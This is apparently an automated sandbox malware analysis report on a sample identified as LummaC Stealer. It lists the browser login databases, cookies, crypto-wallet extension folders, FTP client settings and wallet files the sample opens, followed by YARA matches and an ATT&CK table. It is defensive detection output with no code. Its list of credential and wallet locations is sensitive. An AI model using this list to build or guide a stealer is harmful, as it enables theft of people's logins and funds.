              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153485433.000000000143F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2126656306.000000000143F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157189871.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156552195.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156115915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154213981.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154539398.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153850742.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157640041.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157558824.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157692564.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156174138.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154355396.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154850017.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156037411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154796125.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156976484.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106766668.000000000143F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154725777.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154129411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154641557.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157138050.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153793686.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2158045803.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155243058.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155948563.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155317529.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2081770128.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154029832.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155652947.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156895572.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155068276.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156371674.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156729304.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157064648.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155858032.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154297810.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2081624288.0000000001437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1532, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1532, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
